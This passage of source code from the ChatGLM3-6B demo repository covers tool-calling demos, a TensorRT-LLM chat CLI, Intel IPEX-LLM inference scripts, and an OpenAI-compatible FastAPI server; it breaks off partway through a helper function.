number x, s.t. range[0] <= x < range[1] """ if not isinstance(seed, int): raise TypeError("Seed must be an integer") if not isinstance(range, tuple): raise TypeError("Range must be a tuple") if not isinstance(range[0], int) or not isinstance(range[1], int): raise TypeError("Range must be a tuple of integers") import random return random.Random(seed).randint(*range) @register_tool def get_weather( city_name: Annotated[str, 'The name of the city to be queried', True], ) -> str: """ Get the current weather for `city_name` """ if not isinstance(city_name, str): raise TypeError("City name must be a string") key_selection = { "current_condition": ["temp_C", "FeelsLikeC", "humidity", "weatherDesc", "observation_time"], } import requests try: resp = requests.get(f"https://wttr.in/{city_name}?format=j1") resp.raise_for_status() resp = resp.json() ret = {k: {_v: resp[k][0][_v] for _v in v} for k, v in key_selection.items()} except: import traceback ret = "Error encountered while fetching weather data!\n" + traceback.format_exc() return str(ret) if __name__ == "__main__": print(dispatch_tool("get_weather", {"city_name": "beijing"})) print(get_tools()) File: tools_using_demo/cli_demo_tool.py """ This demo script is designed for interacting with the ChatGLM3-6B in Function, to show Function Call capabilities. 
""" import os import platform import torch from transformers import AutoTokenizer, AutoModel MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) tokenizer = AutoTokenizer.from_pretrained(TOKENIZER_PATH, trust_remote_code=True) model = AutoModel.from_pretrained(MODEL_PATH, trust_remote_code=True, device_map="auto").eval() os_name = platform.system() clear_command = 'cls' if os_name == 'Windows' else 'clear' stop_stream = False def build_prompt(history): prompt = "欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序" for query, response in history: prompt += f"\n\n用户:{query}" prompt += f"\n\nChatGLM3-6B:{response}" return prompt tools = [ {'name': 'track', 'description': '追踪指定股票的实时价格', 'parameters': { 'type': 'object', 'properties': {'symbol': { 'description': '需要追踪的股票代码' } }, 'required': [] } }, { 'name': '/text-to-speech', 'description': '将文本转换为语音', 'parameters': { 'type': 'object', 'properties': { 'text': { 'description': '需要转换成语音的文本' }, 'voice': { 'description': '要使用的语音类型(男声、女声等)' }, 'speed': { 'description': '语音的速度(快、中等、慢等)' } }, 'required': [] } }, { 'name': '/image_resizer', 'description': '调整图片的大小和尺寸', 'parameters': {'type': 'object', 'properties': { 'image_file': { 'description': '需要调整大小的图片文件' }, 'width': { 'description': '需要调整的宽度值' }, 'height': { 'description': '需要调整的高度值' } }, 'required': [] } }, { 'name': '/foodimg', 'description': '通过给定的食品名称生成该食品的图片', 'parameters': { 'type': 'object', 'properties': { 'food_name': { 'description': '需要生成图片的食品名称' } }, 'required': [] } } ] system_item = { "role": "system", "content": "Answer the following questions as best as you can. You have access to the following tools:", "tools": tools } def main(): past_key_values, history = None, [system_item] role = "user" global stop_stream print("欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序") while True: query = input("\n用户:") if role == "user" else input("\n结果:") if query.strip() == "stop": break if query.strip() == "clear": past_key_values, history = None, [system_item] role = "user" os.system(clear_command) print("欢迎使用 ChatGLM3-6B 模型,输入内容即可进行对话,clear 清空对话历史,stop 终止程序") continue print("\nChatGLM:", end="") response, history = model.chat(tokenizer, query, history=history, role=role) print(response, end="", flush=True) print("") if isinstance(response, dict): role = "observation" else: role = "user" if __name__ == "__main__": main() File: tools_using_demo/openai_api_demo.py import json from openai import OpenAI from colorama import init, Fore from loguru import logger from tool_register import get_tools, dispatch_tool init(autoreset=True) client = OpenAI( base_url="http://127.0.0.1:8000/v1", api_key = "xxx" ) tools = get_tools() def run_conversation(query: str, stream=False, tools=None, max_retry=5): params = dict(model="chatglm3", messages=[{"role": "user", "content": query}], stream=stream) if tools: params["tools"] = tools response = client.chat.completions.create(**params) for _ in range(max_retry): if not stream: if response.choices[0].message.function_call: function_call = response.choices[0].message.function_call logger.info(f"Function Call Response: {function_call.model_dump()}") function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(function_call.name, function_args) logger.info(f"Tool Call Response: {tool_response}") params["messages"].append(response.choices[0].message) params["messages"].append( { "role": "function", "name": function_call.name, "content": tool_response, # 调用函数返回结果 } ) 
else: reply = response.choices[0].message.content logger.info(f"Final Reply: \n{reply}") return else: output = "" for chunk in response: content = chunk.choices[0].delta.content or "" print(Fore.BLUE + content, end="", flush=True) output += content if chunk.choices[0].finish_reason == "stop": return elif chunk.choices[0].finish_reason == "function_call": print("\n") function_call = chunk.choices[0].delta.function_call logger.info(f"Function Call Response: {function_call.model_dump()}") function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(function_call.name, function_args) logger.info(f"Tool Call Response: {tool_response}") params["messages"].append( { "role": "assistant", "content": output } ) params["messages"].append( { "role": "function", "name": function_call.name, "content": tool_response, } ) break response = client.chat.completions.create(**params) if __name__ == "__main__": query = "你是谁" run_conversation(query, stream=True) logger.info("\n=========== next conversation ===========") query = "帮我查询北京的天气怎么样" run_conversation(query, tools=tools, stream=True) File: tensorrt_llm_demo/tensorrt_llm_cli_demo.py """ This script is a part of a larger project for generating text using large language models. It includes functionalities for finding engine files, parsing arguments, setting up configurations for different models, and executing the generation process with various settings. This script particularly supports models like ChatGLM3-6B and its variants, handling quantization, serialization, and runtime aspects. Copyright (c) 2022-2023 NVIDIA CORPORATION & AFFILIATES. All rights reserved. Modifications made by Yuxuan.Zhang @ ZhipuAI on 2023-12-24. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Modifications: 1. Removed input_file, tokenizer_type, and other parameters unrelated to dialogue. Set num_beams to 1. 2. Adapted single turn dialogue into ChatGLM3-6B template and implemented multi-turn conversations. """ import argparse import json import torch import transformers from pathlib import Path from typing import List import tensorrt_llm from tensorrt_llm.quantization import QuantMode from tensorrt_llm.runtime import (GenerationSession, ModelConfig, SamplingConfig) def find_engines(dir: Path, model_name: str = "*", dtype: str = "*", tp_size: str = "*", rank: str = "*") -> List[Path]: """ Searches for engine files matching a specified pattern within a directory. This is typically used to locate compiled model files for efficient execution on specific hardware. Parameters: - dir: The directory to search. - model_name, dtype, tp_size, rank: Pattern matching parameters to filter engine files by model name, data type, tensor parallel size, and rank respectively. Returns: - A list of Paths pointing to the engine files. 
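    Example (illustrative; the directory name is made up):
        find_engines(Path("trt_engines"), model_name="chatglm3_6b",
                     dtype="float16", tp_size="1", rank="0")
        globs for "trt_engines/chatglm3_6b_float16_tp1_rank0.engine"; leaving the
        pattern arguments at their "*" defaults matches any engine in the directory.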
""" template = f"{model_name}_{dtype}_tp{tp_size}_rank{rank}.engine" return list(dir.glob(template)) def parse_arguments(args=None): parser = argparse.ArgumentParser() parser.add_argument('--model_name', type=str, choices=[ "chatglm3_6b", "chatglm3_6b_base", "chatglm3_6b_32k" ], default="chatglm3_6b", help='the name of the model') parser.add_argument('--max_output_len', type=int, default=4096) parser.add_argument('--engine_dir', type=str, default=None) parser.add_argument('--tokenizer_dir', type=str, default=None) parser.add_argument('--temperature', type=float, default=0.95) parser.add_argument('--top_k', type=int, default=1) parser.add_argument('--top_p', type=float, default=0.8) parser.add_argument('--random_seed', type=int, default=2023) parser.add_argument('--streaming', default=True, action='store_true') args = parser.parse_args(args) return args def main(): """ The main execution function of the script. It orchestrates the text generation process by performing several key steps: - Parses command-line arguments to configure model details, output specifications, and other user-defined parameters. - Loads the model configuration from a specified directory and prepares the environment for text generation based on the model and hardware specifics. - Sets up the generation session with the appropriate model, tokenizer, and runtime configurations. - Enters a loop to continuously accept user input, generate text based on the provided prompts, and output the model's responses. - Handles special commands such as 'stop' to end the conversation and 'clear' to reset the chat history. - Manages resources and ensures that the generated text is properly formatted and presented to the user. The function is designed to be the entry point of the script, invoking all necessary components and managing the flow of data and control throughout the execution. 
""" args = parse_arguments() config_path = Path(args.engine_dir) / 'config.json' with open(config_path, 'r') as f: config = json.load(f) dtype = config['builder_config']['precision'] max_output_len = min(config['builder_config']['max_output_len'], args.max_output_len) use_gpt_attention_plugin = config['plugin_config']['gpt_attention_plugin'] remove_input_padding = config['builder_config']['remove_input_padding'] tp_size = config['builder_config']['tensor_parallel'] pp_size = config['builder_config']['pipeline_parallel'] world_size = tp_size * pp_size assert world_size == tensorrt_llm.mpi_world_size(), f'Engine world size ({tp_size} * {pp_size}) != Runtime world size ({tensorrt_llm.mpi_world_size()})' max_output_len = min(max_output_len, args.max_output_len) runtime_rank = tensorrt_llm.mpi_rank() runtime_mapping = tensorrt_llm.Mapping(world_size, runtime_rank, tp_size=world_size) torch.cuda.set_device(runtime_rank % runtime_mapping.gpus_per_node) serialize_path = find_engines( dir=Path(args.engine_dir), model_name=args.model_name, dtype=dtype, tp_size=world_size, rank=runtime_rank)[0] tokenizer = transformers.AutoTokenizer.from_pretrained(args.tokenizer_dir, trust_remote_code=True) model_config = ModelConfig(vocab_size=config['builder_config']['vocab_size'], num_layers=config['builder_config']['num_layers'], num_heads=config['builder_config']['num_heads'] // tp_size, num_kv_heads=(config['builder_config']['num_kv_heads'] + tp_size - 1) // tp_size, hidden_size=config['builder_config']['hidden_size'] // tp_size, gpt_attention_plugin=use_gpt_attention_plugin, remove_input_padding=config['builder_config']['remove_input_padding'], model_name=args.model_name, paged_kv_cache=config['builder_config']['paged_kv_cache'], quant_mode=QuantMode(config['builder_config']['quant_mode']), dtype=dtype) sampling_config = SamplingConfig( end_id=tokenizer.eos_token_id, pad_id=tokenizer.pad_token_id, num_beams=1, temperature=args.temperature, top_k=args.top_k, top_p=args.top_p ) sampling_config.random_seed = args.random_seed with open(serialize_path, 'rb') as f: engine_buffer = f.read() session = GenerationSession decoder = session(model_config, engine_buffer, runtime_mapping) history = [] while True: input_text_with_history = "" max_input_len = config['builder_config']['max_input_len'] input_text = input("用户: ") if input_text.lower() == 'stop': break if input_text.lower() == 'clear': history = [] print("ChatGLM3-6B: 对话历史已清空") continue history.append(input_text) for idx, content in enumerate(history): if idx % 2 != 0: input_text_with_history += "{}\n".format(content) else: input_text_with_history += "<|user|>{}\n<|assistant|>".format(content) tokenized = tokenizer( input_text_with_history, return_tensors="pt", padding=True, return_length=True ) input_ids = tokenized['input_ids'].int() input_lengths = tokenized['length'].int() max_input_len_real = torch.max(input_lengths) if max_input_len_real > max_input_len: input_ids = input_ids[:, :max_input_len] input_lengths = torch.where(input_lengths > max_input_len, max_input_len, input_lengths) else: max_input_len = max_input_len_real if remove_input_padding: input_ids_no_padding = (torch.zeros(1, torch.sum(input_lengths), dtype=torch.int32)) lengths_acc = torch.cumsum(torch.cat([torch.IntTensor([0]), input_lengths]), dim=0) for i in range(len(input_ids)): input_ids_no_padding[0, lengths_acc[i]:lengths_acc[i + 1]] = torch.IntTensor( input_ids[i, max_input_len - input_lengths[i]:max_input_len]) input_ids = input_ids_no_padding elif use_gpt_attention_plugin: 
input_ids_padding_right = torch.zeros_like(input_ids) + sampling_config.end_id for i, sample in enumerate(input_ids): nPadding = 0 for token in sample: if token == sampling_config.pad_id: nPadding += 1 else: break input_ids_padding_right[i, :len(sample[nPadding:])] = sample[nPadding:] input_ids = input_ids_padding_right input_lengths = torch.tensor([input_ids.shape[-1]], dtype=torch.int32) decoder.setup(1, max_input_len, max_output_len, 1) output = decoder.decode( input_ids.contiguous().cuda(), input_lengths.contiguous().cuda(), sampling_config, output_sequence_lengths=True, return_dict=True, streaming=args.streaming ) print("ChatGLM3-6B:", end="") generated_text = "" if args.streaming: for output_item in output: output_id = output_item["output_ids"] output_sequence_lengths = output_item["sequence_lengths"] output_id = output_id[0, 0, output_sequence_lengths[0, 0] - 1] output_word = tokenizer.convert_ids_to_tokens(int(output_id)) output_word = output_word.replace("▁", " ") output_word = tokenizer.convert_tokens_to_string(output_word) print(output_word, end="", flush=True) generated_text += output_word print("\n") else: torch.cuda.synchronize() output_ids = output["output_ids"][0] output = output_ids[0, input_lengths.item():] generated_text = tokenizer.decode(output, skip_special_tokens=True) print(generated_text) history.append(generated_text) del decoder print(f"Good bye!") if __name__ == '__main__': main() File: Intel_device_demo/ipex_llm_cpu_demo/chatglm3_web_demo.py """ This script creates an interactive web demo for the ChatGLM3-6B model using Gradio, a Python library for building quick and easy UI components for machine learning models. It's designed to showcase the capabilities of the ChatGLM3-6B model in a user-friendly interface, allowing users to interact with the model through a chat-like interface. Usage: - Run the script to start the Gradio web server. - Interact with the model by typing questions and receiving responses. Requirements: - Gradio (required for 4.13.0 and later, 3.x is not support now) should be installed. Note: The script includes a modification to the Chatbot's postprocess method to handle markdown to HTML conversion, ensuring that the chat interface displays formatted text correctly. 
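Launching:
    This IPEX-LLM variant of the demo is built on Streamlit rather than Gradio
    (see the imports below), so start it with `streamlit run chatglm3_web_demo.py`.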
""" import os import streamlit as st from ipex_llm.transformers import AutoModel from transformers import AutoTokenizer st.set_page_config( page_title="ChatGLM3-6B+BigDL-LLM demo", page_icon=":robot:", layout="wide" ) MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') @st.cache_resource def get_model(): model = AutoModel.from_pretrained(MODEL_PATH, load_in_4bit=True, trust_remote_code=True) tokenizer = AutoTokenizer.from_pretrained(MODEL_PATH, trust_remote_code=True) return tokenizer, model tokenizer, model = get_model() if "history" not in st.session_state: st.session_state.history = [] if "past_key_values" not in st.session_state: st.session_state.past_key_values = None max_length = st.sidebar.slider("max_length", 0, 32768, 8192, step=1) top_p = st.sidebar.slider("top_p", 0.0, 1.0, 0.8, step=0.01) temperature = st.sidebar.slider("temperature", 0.0, 1.0, 0.6, step=0.01) buttonClean = st.sidebar.button("clearing session history", key="clean") if buttonClean: st.session_state.history = [] st.session_state.past_key_values = None st.rerun() for i, message in enumerate(st.session_state.history): if message["role"] == "user": with st.chat_message(name="user", avatar="user"): st.markdown(message["content"]) else: with st.chat_message(name="assistant", avatar="assistant"): st.markdown(message["content"]) with st.chat_message(name="user", avatar="user"): input_placeholder = st.empty() with st.chat_message(name="assistant", avatar="assistant"): message_placeholder = st.empty() prompt_text = st.chat_input("please enter your question.") if prompt_text: input_placeholder.markdown(prompt_text) history = st.session_state.history past_key_values = st.session_state.past_key_values for response, history, past_key_values in model.stream_chat( tokenizer, prompt_text, history, past_key_values=past_key_values, max_length=max_length, top_p=top_p, temperature=temperature, return_past_key_values=True, ): message_placeholder.markdown(response) st.session_state.history = history st.session_state.past_key_values = past_key_values File: Intel_device_demo/ipex_llm_cpu_demo/generate.py import torch import time import argparse import numpy as np from ipex_llm.transformers import AutoModel from modelscope import AutoTokenizer from transformers import AutoTokenizer # you could tune the prompt based on your own model, # here the prompt tuning refers to https://github.com/THUDM/ChatGLM3/blob/main/PROMPT.md CHATGLM_V3_PROMPT_FORMAT = "<|user|>\n{prompt}\n<|assistant|>" if __name__ == '__main__': parser = argparse.ArgumentParser(description='Predict Tokens using `generate()` API for ModelScope ChatGLM3 model') parser.add_argument('--repo-id-or-model-path', type=str, default="ZhipuAI/chatglm3-6b", help='The ModelScope repo id for the ChatGLM3 model to be downloaded' ', or the path to the ModelScope checkpoint folder') parser.add_argument('--prompt', type=str, default="AI是什么?", help='Prompt to infer') parser.add_argument('--n-predict', type=int, default=32, help='Max tokens to predict') args = parser.parse_args() model_path = args.repo_id_or_model_path # Load model in 4 bit, # which convert the relevant layers in the model into INT4 format # It is important to set `model_hub='modelscope'`, otherwise model hub is default to be huggingface model = AutoModel.from_pretrained(model_path, load_in_4bit=True, trust_remote_code=True, model_hub='modelscope') # Load tokenizer tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True) # Generate predicted tokens with torch.inference_mode(): prompt = 
CHATGLM_V3_PROMPT_FORMAT.format(prompt=args.prompt) input_ids = tokenizer.encode(prompt, return_tensors="pt") st = time.time() # if your selected model is capable of utilizing previous key/value attentions # to enhance decoding speed, but has `"use_cache": false` in its model config, # it is important to set `use_cache=True` explicitly in the `generate` function # to obtain optimal performance with IPEX-LLM INT4 optimizations output = model.generate(input_ids, max_new_tokens=args.n_predict) end = time.time() output_str = tokenizer.decode(output[0], skip_special_tokens=True) print(f'Inference time: {end - st} s') print('-' * 20, 'Prompt', '-' * 20) print(prompt) print('-' * 20, 'Output', '-' * 20) print(output_str) File: Intel_device_demo/ipex_llm_cpu_demo/chatglm3_infer.py import time from ipex_llm.transformers import AutoModel from transformers import AutoTokenizer CHATGLM_V3_PROMPT_FORMAT = "\n{prompt}\n" # Please specify the local path to the chatglm3-6b model model_path = "D:\AI\ChatGLM3\model/chatglm3-6b/" # Load the ChatGLM3-6B model and quantize it to INT4 model = AutoModel.from_pretrained(model_path, load_in_4bit=True, trust_remote_code=True) # Load the tokenizer tokenizer = AutoTokenizer.from_pretrained(model_path, trust_remote_code=True) # Prepare ChatGLM3 format prompt prompt = CHATGLM_V3_PROMPT_FORMAT.format(prompt="Who are you?") # Encode the prompt input_ids = tokenizer.encode(prompt, return_tensors="pt") st = time.time() # Perform inference calculation and generate Tokens output = model.generate(input_ids,max_new_tokens=32) end = time.time() # Decode the generated Tokens and display them output_str = tokenizer.decode(output[0], skip_special_tokens=True) print(f'Inference time: {end-st} s') print('-'*20, 'Prompt', '-'*20) print(prompt) print('-'*20, 'Output', '-'*20) print(output_str) File: Intel_device_demo/ipex_llm_cpu_demo/api_server.py """ This script implements an API for the ChatGLM3-6B model, formatted similarly to OpenAI's API (https://platform.openai.com/docs/api-reference/chat). It's designed to be run as a web server using FastAPI and uvicorn, making the ChatGLM3-6B model accessible through OpenAI Client. Key Components and Features: - Model and Tokenizer Setup: Configures the model and tokenizer paths and loads them. - FastAPI Configuration: Sets up a FastAPI application with CORS middleware for handling cross-origin requests. - API Endpoints: - "/v1/models": Lists the available models, specifically ChatGLM3-6B. - "/v1/chat/completions": Processes chat completion requests with options for streaming and regular responses. - "/v1/embeddings": Processes Embedding request of a list of text inputs. - Token Limit Caution: In the OpenAI API, 'max_tokens' is equivalent to HuggingFace's 'max_new_tokens', not 'max_length'. For instance, setting 'max_tokens' to 8192 for a 6b model would result in an error due to the model's inability to output that many tokens after accounting for the history and prompt tokens. - Stream Handling and Custom Functions: Manages streaming responses and custom function calls within chat responses. - Pydantic Models: Defines structured models for requests and responses, enhancing API documentation and type safety. - Main Execution: Initializes the model and tokenizer, and starts the FastAPI app on the designated host and port. Note: This script doesn't include the setup for special tokens or multi-GPU support by default. Users need to configure their special tokens and can enable multi-GPU support as per the provided instructions. 
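Example (a minimal sketch using the OpenAI Python client, mirroring openai_api_request.py
in this directory; the api_key value is just a placeholder):

    from openai import OpenAI

    client = OpenAI(base_url="http://127.0.0.1:8000/v1", api_key="EMPTY")
    response = client.chat.completions.create(
        model="chatglm3-6b",
        messages=[{"role": "user", "content": "Hello"}],
    )
    print(response.choices[0].message.content)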
Embedding Models only support in One GPU. """ import os import time import tiktoken import torch import uvicorn from fastapi import FastAPI, HTTPException, Response from fastapi.middleware.cors import CORSMiddleware from contextlib import asynccontextmanager from typing import List, Literal, Optional, Union from loguru import logger from pydantic import BaseModel, Field from ipex_llm.transformers import AutoModel from transformers import AutoTokenizer from utils import process_response, generate_chatglm3, generate_stream_chatglm3 # from sentence_transformers import SentenceTransformer from sse_starlette.sse import EventSourceResponse # Set up limit request time EventSourceResponse.DEFAULT_PING_INTERVAL = 1000 # set LLM path MODEL_PATH = os.environ.get('MODEL_PATH', 'THUDM/chatglm3-6b') TOKENIZER_PATH = os.environ.get("TOKENIZER_PATH", MODEL_PATH) # set Embedding Model path EMBEDDING_PATH = os.environ.get('EMBEDDING_PATH', 'BAAI/bge-large-zh-v1.5') @asynccontextmanager async def lifespan(app: FastAPI): yield if torch.cuda.is_available(): torch.cuda.empty_cache() torch.cuda.ipc_collect() app = FastAPI(lifespan=lifespan) app.add_middleware( CORSMiddleware, allow_origins=["*"], allow_credentials=True, allow_methods=["*"], allow_headers=["*"], ) class ModelCard(BaseModel): id: str object: str = "model" created: int = Field(default_factory=lambda: int(time.time())) owned_by: str = "owner" root: Optional[str] = None parent: Optional[str] = None permission: Optional[list] = None class ModelList(BaseModel): object: str = "list" data: List[ModelCard] = [] class FunctionCallResponse(BaseModel): name: Optional[str] = None arguments: Optional[str] = None class ChatMessage(BaseModel): role: Literal["user", "assistant", "system", "function"] content: str = None name: Optional[str] = None function_call: Optional[FunctionCallResponse] = None class DeltaMessage(BaseModel): role: Optional[Literal["user", "assistant", "system"]] = None content: Optional[str] = None function_call: Optional[FunctionCallResponse] = None ## for Embedding class EmbeddingRequest(BaseModel): input: List[str] model: str class CompletionUsage(BaseModel): prompt_tokens: int completion_tokens: int total_tokens: int class EmbeddingResponse(BaseModel): data: list model: str object: str usage: CompletionUsage # for ChatCompletionRequest class UsageInfo(BaseModel): prompt_tokens: int = 0 total_tokens: int = 0 completion_tokens: Optional[int] = 0 class ChatCompletionRequest(BaseModel): model: str messages: List[ChatMessage] temperature: Optional[float] = 0.8 top_p: Optional[float] = 0.8 max_tokens: Optional[int] = None stream: Optional[bool] = False tools: Optional[Union[dict, List[dict]]] = None repetition_penalty: Optional[float] = 1.1 class ChatCompletionResponseChoice(BaseModel): index: int message: ChatMessage finish_reason: Literal["stop", "length", "function_call"] class ChatCompletionResponseStreamChoice(BaseModel): delta: DeltaMessage finish_reason: Optional[Literal["stop", "length", "function_call"]] index: int class ChatCompletionResponse(BaseModel): model: str id: str object: Literal["chat.completion", "chat.completion.chunk"] choices: List[Union[ChatCompletionResponseChoice, ChatCompletionResponseStreamChoice]] created: Optional[int] = Field(default_factory=lambda: int(time.time())) usage: Optional[UsageInfo] = None @app.get("/health") async def health() -> Response: """Health check.""" return Response(status_code=200) @app.post("/v1/embeddings", response_model=EmbeddingResponse) async def get_embeddings(request: 
EmbeddingRequest): embeddings = [embedding_model.encode(text) for text in request.input] embeddings = [embedding.tolist() for embedding in embeddings] def num_tokens_from_string(string: str) -> int: """ Returns the number of tokens in a text string. use cl100k_base tokenizer """ encoding = tiktoken.get_encoding('cl100k_base') num_tokens = len(encoding.encode(string)) return num_tokens response = { "data": [ { "object": "embedding", "embedding": embedding, "index": index } for index, embedding in enumerate(embeddings) ], "model": request.model, "object": "list", "usage": CompletionUsage( prompt_tokens=sum(len(text.split()) for text in request.input), completion_tokens=0, total_tokens=sum(num_tokens_from_string(text) for text in request.input), ) } return response @app.get("/v1/models", response_model=ModelList) async def list_models(): model_card = ModelCard( id="chatglm3-6b" ) return ModelList( data=[model_card] ) @app.post("/v1/chat/completions", response_model=ChatCompletionResponse) async def create_chat_completion(request: ChatCompletionRequest): global model, tokenizer if len(request.messages) < 1 or request.messages[-1].role == "assistant": raise HTTPException(status_code=400, detail="Invalid request") gen_params = dict( messages=request.messages, temperature=request.temperature, top_p=request.top_p, max_tokens=request.max_tokens or 1024, echo=False, stream=request.stream, repetition_penalty=request.repetition_penalty, tools=request.tools, ) logger.debug(f"==== request ====\n{gen_params}") if request.stream: # Use the stream mode to read the first few characters, if it is not a function call, direct stram output predict_stream_generator = predict_stream(request.model, gen_params) output = next(predict_stream_generator) if not contains_custom_function(output): return EventSourceResponse(predict_stream_generator, media_type="text/event-stream") # Obtain the result directly at one time and determine whether tools needs to be called. logger.debug(f"First result output:\n{output}") function_call = None if output and request.tools: try: function_call = process_response(output, use_tool=True) except: logger.warning("Failed to parse tool call") # CallFunction if isinstance(function_call, dict): function_call = FunctionCallResponse(**function_call) """ In this demo, we did not register any tools. You can use the tools that have been implemented in our `tools_using_demo` and implement your own streaming tool implementation here. Similar to the following method: function_args = json.loads(function_call.arguments) tool_response = dispatch_tool(tool_name: str, tool_params: dict) """ tool_response = "" if not gen_params.get("messages"): gen_params["messages"] = [] gen_params["messages"].append(ChatMessage( role="assistant", content=output, )) gen_params["messages"].append(ChatMessage( role="function", name=function_call.name, content=tool_response, )) # Streaming output of results after function calls generate = predict(request.model, gen_params) return EventSourceResponse(generate, media_type="text/event-stream") else: # Handled to avoid exceptions in the above parsing function process. 
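            # No usable tool call was extracted from the first chunk, so stream the
            # already-generated text back to the client verbatim.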
generate = parse_output_text(request.model, output) return EventSourceResponse(generate, media_type="text/event-stream") # Here is the handling of stream = False response = generate_chatglm3(model, tokenizer, gen_params) # Remove the first newline character if response["text"].startswith("\n"): response["text"] = response["text"][1:] response["text"] = response["text"].strip() usage = UsageInfo() function_call, finish_reason = None, "stop" if request.tools: try: function_call = process_response(response["text"], use_tool=True) except: logger.warning("Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, dict): finish_reason = "function_call" function_call = FunctionCallResponse(**function_call) message = ChatMessage( role="assistant", content=response["text"], function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) logger.debug(f"==== message ====\n{message}") choice_data = ChatCompletionResponseChoice( index=0, message=message, finish_reason=finish_reason, ) task_usage = UsageInfo.model_validate(response["usage"]) for usage_key, usage_value in task_usage.model_dump().items(): setattr(usage, usage_key, getattr(usage, usage_key) + usage_value) return ChatCompletionResponse( model=request.model, id="", # for open_source model, id is empty choices=[choice_data], object="chat.completion", usage=usage ) async def predict(model_id: str, params: dict): global model, tokenizer choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant"), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) previous_text = "" for new_response in generate_stream_chatglm3(model, tokenizer, params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(previous_text):] previous_text = decoded_unicode finish_reason = new_response["finish_reason"] if len(delta_text) == 0 and finish_reason != "function_call": continue function_call = None if finish_reason == "function_call": try: function_call = process_response(decoded_unicode, use_tool=True) except: logger.warning( "Failed to parse tool call, maybe the response is not a tool call or have been answered.") if isinstance(function_call, dict): function_call = FunctionCallResponse(**function_call) delta = DeltaMessage( content=delta_text, role="assistant", function_call=function_call if isinstance(function_call, FunctionCallResponse) else None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=delta, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def predict_stream(model_id, gen_params): """ The function call is compatible with stream mode output. The first seven characters are determined. If not a function call, the stream output is directly generated. Otherwise, the complete character content of the function call is returned. 
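    (Concretely, `contains_custom_function` is only consulted once more than seven
    characters of output have accumulated, which is enough to recognise the
    `get_`-style tool-name prefix used by the registered tools in this repo.)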
:param model_id: :param gen_params: :return: """ output = "" is_function_call = False has_send_first_chunk = False for new_response in generate_stream_chatglm3(model, tokenizer, gen_params): decoded_unicode = new_response["text"] delta_text = decoded_unicode[len(output):] output = decoded_unicode # When it is not a function call and the character length is> 7, # try to judge whether it is a function call according to the special function prefix if not is_function_call and len(output) > 7: # Determine whether a function is called is_function_call = contains_custom_function(output) if is_function_call: continue # Non-function call, direct stream output finish_reason = new_response["finish_reason"] # Send an empty string first to avoid truncation by subsequent next() operations. if not has_send_first_chunk: message = DeltaMessage( content="", role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) send_msg = delta_text if has_send_first_chunk else output has_send_first_chunk = True message = DeltaMessage( content=send_msg, role="assistant", function_call=None, ) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=message, finish_reason=finish_reason ) chunk = ChatCompletionResponse( model=model_id, id="", choices=[choice_data], created=int(time.time()), object="chat.completion.chunk" ) yield "{}".format(chunk.model_dump_json(exclude_unset=True)) if is_function_call: yield output else: yield '[DONE]' async def parse_output_text(model_id: str, value: str): """ Directly output the text content of value :param model_id: :param value: :return: """ choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(role="assistant", content=value), finish_reason=None ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) choice_data = ChatCompletionResponseStreamChoice( index=0, delta=DeltaMessage(), finish_reason="stop" ) chunk = ChatCompletionResponse(model=model_id, id="", choices=[choice_data], object="chat.completion.chunk") yield "{}".format(chunk.model_dump_json(exclude_unset=True)) yield '[DONE]' def contains_custom_function(value: str) -> bool: """ Determine whether 'function_call' according to a special function prefix. For example, the functions defined in "tools_using_demo/tool_register.py" are all "get_xxx" and start with "get_" [Note] This is not a rigorous judgment method, only for reference. 
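    For example, any generated text containing `get_` (such as an output that
    starts with `get_weather`) is treated as a function call, while ordinary chat
    text without that substring is not.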
